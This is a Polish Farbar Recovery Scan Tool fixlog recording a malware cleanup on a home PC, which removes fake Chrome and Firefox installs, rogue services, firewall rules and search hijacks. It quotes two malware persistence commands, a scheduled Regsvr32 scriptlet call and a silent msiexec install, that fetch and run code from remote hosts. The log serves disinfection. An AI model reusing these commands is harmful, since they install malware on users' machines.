Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 23-04-2017 01 Uruchomiony przez Janusz (25-04-2017 08:14:37) Run:1 Uruchomiony z C:\Users\Janusz\Downloads Załadowane profile: Janusz (Dostępne profile: Janusz) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Hotben RemoveDirectory: C:\Users\Janusz\AppData\Local\Hotben Task: {0799A11B-BBCE-415E-8524-1C733F6F6689} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {2524CC03-F09A-46EF-892D-6174963B19D8} - \WPD\SqmUpload_S-1-5-21-2487835237-2257990825-3517168332-1001 -> Brak pliku <==== UWAGA Task: {44AF63F8-B7C5-4730-95AD-D0365E220B1F} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {77F28D2F-FA47-4C2C-B721-7C270588F307} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {9BF3A04E-404B-433E-A4D6-788369AFB24C} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {B9962562-7BA3-446C-8C2D-1001B91445AE} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== scrobj.dll C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\Public\Desktop\Google Chrome.lnk FirewallRules: [{F2A4227C-2518-4FD8-8BF8-7B4F21DDD335}] => (Allow) C:\Program Files (x86)\Hotben\Application\chrome.exe FirewallRules: [{A21039B9-F973-45F9-9E02-6D0CAA4F2841}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{AA08C75C-F2DB-4174-B872-5B02748EAF9E}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Janusz\AppData\Local\Firefox RemoveDirectory: C:\Users\Janusz\AppData\Roaming\Firefox R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-18] () <==== UWAGA HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMkZWNTYcRTI1FjE8N8E4MdQYM8UcMYU1MThQM8MdNq== /q IFEO\taskmgr.exe: [Debugger]  SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> DefaultScope {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL =  SearchScopes: HKU\S-1-5-21-2487835237-2257990825-3517168332-1001 -> {32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} URL =  HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) <==== UWAGA U2 Kitty; C:\Users\Janusz\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [Brak podpisu cyfrowego] <==== UWAGA R2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [107008 2017-04-18] () [Brak podpisu cyfrowego] S2 HWDeviceService64.exe; "C:\ProgramData\DatacardService\HWDeviceService64.exe" -/service [X] U3 ugldipob; C:\Users\Janusz\AppData\Local\Temp\ugldipob.sys [56584 2017-04-24] (GMER) [Brak podpisu cyfrowego] <==== UWAGA S3 ew_hwusbdev; \SystemRoot\system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; \SystemRoot\System32\drivers\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; \SystemRoot\system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_ext_ctrl; \SystemRoot\System32\drivers\ew_juextctrl.sys [X] S3 huawei_wwanecm; \SystemRoot\System32\drivers\ew_juwwanecm.sys [X] 2017-04-06 12:42 - 2017-04-06 12:42 - 01255768 _____ ( ) C:\Users\Janusz\Downloads\Skype-13018-AsystentPobierania.exe C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Janusz\AppData\Local\Mozilla C:\Users\Janusz\AppData\Roaming\Mozilla C:\Users\Janusz\AppData\Roaming\Profiles EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-2487835237-2257990825-3517168332-1001_Classes\ChromeHTML => klucz pomyślnie usunięto " C:\Program Files (x86)\Hotben" => nie znaleziono. "C:\Users\Janusz\AppData\Local\Hotben" => pomyślnie usunięto. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0799A11B-BBCE-415E-8524-1C733F6F6689} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0799A11B-BBCE-415E-8524-1C733F6F6689} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2524CC03-F09A-46EF-892D-6174963B19D8} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2524CC03-F09A-46EF-892D-6174963B19D8} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-2487835237-2257990825-3517168332-1001 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{44AF63F8-B7C5-4730-95AD-D0365E220B1F} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{44AF63F8-B7C5-4730-95AD-D0365E220B1F} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{77F28D2F-FA47-4C2C-B721-7C270588F307} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{77F28D2F-FA47-4C2C-B721-7C270588F307} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9BF3A04E-404B-433E-A4D6-788369AFB24C} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9BF3A04E-404B-433E-A4D6-788369AFB24C} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B9962562-7BA3-446C-8C2D-1001B91445AE} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B9962562-7BA3-446C-8C2D-1001B91445AE} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F0B467EC-C9B6-4E2A-8020-CDD154D3C6BD} => klucz pomyślnie usunięto C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Google Chrome.lnk => pomyślnie przeniesiono HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F2A4227C-2518-4FD8-8BF8-7B4F21DDD335} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A21039B9-F973-45F9-9E02-6D0CAA4F2841} => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{AA08C75C-F2DB-4174-B872-5B02748EAF9E} => Wartość pomyślnie usunięto " C:\Program Files (x86)\Firefox" => nie znaleziono. "C:\Users\Janusz\AppData\Local\Firefox" => pomyślnie usunięto. "C:\Users\Janusz\AppData\Roaming\Firefox" => pomyślnie usunięto. HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} => klucz pomyślnie usunięto HKCR\CLSID\{32B7ACE0-EDCA-4E79-B5E3-263115A9A6F8} => klucz nie znaleziono. HKU\S-1-5-21-2487835237-2257990825-3517168332-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => klucz pomyślnie usunięto HKLM\System\CurrentControlSet\Services\Kitty => klucz pomyślnie usunięto Kitty => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\WindowsAppVerifierSvr => klucz pomyślnie usunięto WindowsAppVerifierSvr => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\HWDeviceService64.exe => klucz pomyślnie usunięto HWDeviceService64.exe => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\ugldipob => klucz pomyślnie usunięto ugldipob => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\ew_hwusbdev => klucz pomyślnie usunięto ew_hwusbdev => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\ew_usbenumfilter => klucz pomyślnie usunięto ew_usbenumfilter => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\huawei_cdcacm => klucz pomyślnie usunięto huawei_cdcacm => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\huawei_ext_ctrl => klucz pomyślnie usunięto huawei_ext_ctrl => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\huawei_wwanecm => klucz pomyślnie usunięto huawei_wwanecm => serwis pomyślnie usunięto C:\Users\Janusz\Downloads\Skype-13018-AsystentPobierania.exe => pomyślnie przeniesiono C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Calendar.lnk => pomyślnie przeniesiono C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.Mail.lnk => pomyślnie przeniesiono C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Microsoft.WindowsLive.People.lnk => pomyślnie przeniesiono C:\Users\Janusz\AppData\Local\Microsoft\Windows\Application Shortcuts\Microsoft.Studios.PinballFx2_8wekyb3d8bbwe\Pinball.App.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Janusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk => pomyślnie przeniesiono C:\Users\Public\Desktop\Mozilla Firefox.lnk => pomyślnie przeniesiono HKCU\Software\Mozilla => klucz pomyślnie usunięto HKCU\Software\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Mozilla => klucz nie znaleziono. HKLM\SOFTWARE\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto "C:\Users\Janusz\AppData\Local\Mozilla" => nie znaleziono. C:\Users\Janusz\AppData\Roaming\Mozilla => pomyślnie przeniesiono "C:\Users\Janusz\AppData\Roaming\Profiles" => nie znaleziono. =========== EmptyTemp: ========== BITS transfer queue => 294145 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 22265176 B Java, Flash, Steam htmlcache => 958 B Windows/system/drivers => 134438 B Edge => 36776853 B Chrome => 4070400 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 6656 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 1335 B systemprofile32 => 128 B LocalService => 5762 B NetworkService => 0 B Janusz => 32178771 B RecycleBin => 0 B EmptyTemp: => 91.3 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 08:17:42 ====